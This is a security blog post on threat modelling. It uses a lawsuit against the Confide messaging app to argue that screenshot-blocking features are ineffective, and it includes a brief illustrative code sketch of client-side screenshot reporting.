Adam Caudill <![CDATA[Confide, Screenshots, and Imaginary Threats]]> 2017-04-22T05:20:40Z 2017-04-22T05:20:40Z Recently Vice published a story about a lawsuit against the makers of the ‘secure’ messaging application Confide. This isn’t just a lawsuit, it’s a class-action lawsuit and brought by Edelson PC – an amazingly successful (and sometimes hated1) law firm – this isn’t a simple case. The complaint includes a very important point: Specifically, Confide… Continue reading Confide, Screenshots, and Imaginary Threats

The post Confide, Screenshots, and Imaginary Threats appeared first on Adam Caudill.


Recently Vice published a story about a lawsuit against the makers of the ‘secure’ messaging application Confide. This isn’t just a lawsuit, it’s a class-action lawsuit and brought by Edelson PC – an amazingly successful (and sometimes hated1) law firm – this isn’t a simple case. The complaint includes a very important point:

Specifically, Confide fails to deliver on two of the three requirements that it espouses as necessary for confidential communications: ephemerality and screenshot protection. […] Confide represents, in no uncertain terms, that its App blocks screenshots. But that isn’t true. Any Confide user accessing the platform through the Windows App can take screenshots of any and all received messages.

This article isn’t about the lawsuit though, it’s about threat modeling and screenshots.

Of Screenshots and Cameras

Preventing screenshots, or at least attempting to, has been around for some time, and was made popular thanks to Snapchat – their client would detect that a screenshot was captured, and using an API call, notify the server that this had happened (unsurprisingly, this API was rarely documented, as none of the third-party clients wanted it), so the sender could be alerted. When this feature was added, technical attacks were discussed by many that were following Snapchat’s attempts at living up to their word – from modifying the binary to not make the API call, to using a proxy server that would block the call to the server.
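A hypothetical sketch of this kind of client-side detection (not Snapchat’s actual API – the class, method, and payload here are invented for illustration) shows why it is so easy to defeat: the report originates on a device the "attacker" fully controls.

```python
class ScreenshotReporter:
    """Hypothetical client-side screenshot reporting (names invented).

    The client observes the OS screenshot event and tells the server so
    the sender can be alerted. Because this code runs on the
    screenshotter's own device, it can be patched out of the binary, or
    the request simply dropped at a proxy -- the server never knows.
    """

    def __init__(self, transport):
        self.transport = transport  # e.g. an HTTP session; injected for testing

    def on_screenshot(self, conversation_id):
        self.transport.send({"event": "screenshot",
                             "conversation": conversation_id})
```

Blocking that single send call – at a proxy, or by modifying the client – silently disables the feature, which is exactly what was discussed when Snapchat added it.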

Yet for all of the technical solutions, there was an easier answer: grab another device with a camera and take a picture.

Many people that work in corporate or other environments that have strict security requirements often carry two mobile devices – if you know (or suspect) that a messaging application will block or report a screenshot, just take a picture of it with your other device. This completely bypasses the technical restriction on screenshots2. It’s simple, it works, and it’s undetectable. Then there are virtual machines – you could run an application in a virtual machine, and capture the screenshot from the host, instead of the guest operating system. Once again, this is effective and undetectable. Then there are numerous others.

Trust Violated

If you can’t trust the person you are talking to, don’t talk to them. If you send a message containing sensitive statements to somebody you can’t trust to keep it private, the only way to ensure that it’s not shared is to simply not send it. There is no technical solution to ensure that a message displayed on a screen is actually ephemeral. This is why high security environments where sensitive (i.e. classified) information may be on display don’t allow cameras, or devices with cameras, at all.

If a user wants to capture information about a conversation, they will get it – there are numerous ways to do just that. If they take a little care, nobody will know that they’ve done it. If they have technical ability (or know somebody that does), then it’ll be effortless and undetectable. Confide may, and should, make changes so that their screenshot protection feature behaves more effectively; that said, they will never be able to actually prevent all screenshots.

Screenshot protection is a vain effort; if it’s displayed on screen, it can be captured. People may think that they need it because it’s how they would capture a conversation, but it doesn’t actually provide any effective security. Features like this, and claims that applications implement them, are little more than snake-oil aimed at making consumers believe that an application provides a level of security that isn’t actually possible.

  1. Jay Edelson & team may be hated by some in Silicon Valley – but they have done a lot to protect consumers, and suing over security claims is an important avenue to ensure that companies live up to their promises. My research on Snapchat was cited by the FTC in their action against Snapchat, which I am still very proud of. Needless to say, I favor whatever action is necessary to ensure that companies live up to their promises, and consumers aren’t being sold snake-oil. 
  2. There are theoretical means to complicate this, by using a controlled “flicker” to make it more difficult to capture a useable photo. This comes with various downsides, not the least of which is the high likelihood of giving users a constant headache. 
